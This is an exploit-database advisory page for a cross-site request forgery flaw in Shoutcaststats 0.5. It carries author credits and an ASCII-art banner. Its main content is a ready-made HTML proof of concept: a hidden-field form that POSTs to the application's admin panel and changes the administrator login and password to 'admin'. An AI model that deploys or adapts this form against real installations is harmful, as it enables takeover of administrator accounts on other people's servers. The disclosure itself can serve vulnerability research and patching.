Shoutcaststats 0.5 Cross Site Request Forgery

2010.11.30
Credit: anT!-Tr0J4n
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

================================= shoutcaststats.v0.5 Changer Login and Pass CSRF Vulnerability ================================= || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 _ __ __ ________ __ __ 3 7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7 1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1 3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3 3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3 7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7 1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1 3 >> Exploit database separated by exploit 3 3 type (local, remote, DoS, etc.) 3 7 7 1 [+] Site : 1337db.com 1 3 [+] Support e-mail : submit[at]1337db.com 3 3 3 7 ############################################## 7 1 I'm anT!-Tr0J4n 1337 Member from 1337 DataBase 1 3 ############################################## 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 # Exploit Title: shoutcaststats.v0.5 Changer Login and Pass CSRF Vulnerability # Date : 27-11-2010 # Author : anT!-Tr0J4n # Home : www.Dev-PoinT.com : http://1337db.com #Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com #Greetz : Dev-PoinT.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l #special thanks to 1337 DataBase team : r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu ############################################################################## Exploit to Change Admin login and password : <html> <head> <title>Remote CSRF Change Admin login and password by anT!-Tr0J4n </head> <body> <H2>Changer Login and Pass CSRF Vulnerability</H2> <form method="POST" name="form0" action="http://localhost/shoutcaststats.v0.5.b4/admin/panel.php?settings=acfg&submitted"> <input type="hidden" name="aunm" value="admin"/> <input type="hidden" name="aups" value="admin"/> <input type="hidden" name="srps" value="admin"/> <input type="hidden" name="pin4" value="4252"/> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top